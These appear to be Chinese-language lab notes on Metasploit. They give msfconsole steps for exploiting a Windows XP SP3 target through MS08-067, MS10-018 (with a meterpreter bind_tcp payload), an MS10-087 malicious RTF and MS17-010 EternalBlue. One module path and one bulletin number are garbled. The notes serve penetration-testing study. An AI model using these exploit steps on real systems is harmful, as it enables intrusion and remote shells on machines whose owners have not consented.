msf

MSF Kali下存放⽬录：/usr/share/metasploit-framework/ ⽤到的靶机为：WinXPenSP3。
1，search搜索；例如搜索命令例如搜索ms08-067模块，执⾏search ms08-067。search ms08-067
使用use exploit/windows/smb/ms08_067_netapi，back从当前环境返回。
connect连接⼀个主机，例如下图所示连接到百度的80端⼝。connect www.baidu.com 80

2，msfsen渗透测试（MS08-067）
【1，在kali中使用msfconsole
2，执⾏search MS08-067命令。
3，执⾏use exploit/windows/smb/ms08_067_netapi命令
4，options命令查看配置
5，在虚拟查看ip
6，执⾏set RHOST ip地址
7，执⾏run命令。】

3，浏览器攻击渗透（MS10-018）

【1在kali中使用msfconsole

2执⾏search ms10-018命令

3use exploit/windows/bexirowser/ms10_018_ie_behaviors

4执⾏show options命令，查看要设置哪些东⻄。

5设置⼀下⾃⼰服务器的ip：

6设置⼀个payload正向连接shell：set PAYLOAD windows/meterpreter/bind_tcp】

4，应⽤软件格式渗透 利⽤word去渗透（MS10-087）

【1进⼊msfconsole下。搜索下ms10-018的路径：search ms10-087。
2Use exploit/windows/fileformat/ms10_087_rtf_pfragments_bof
3：set CMD calc.exe。】

5，Metasploit永恒之蓝（ms17_010）
1msfconsole
2use exploit/windows/smb/ms17_010_eternalblue
3set rhosts id
4set LHOST 0.0.0.0
5set payload windows/x64/shell/bind_tcp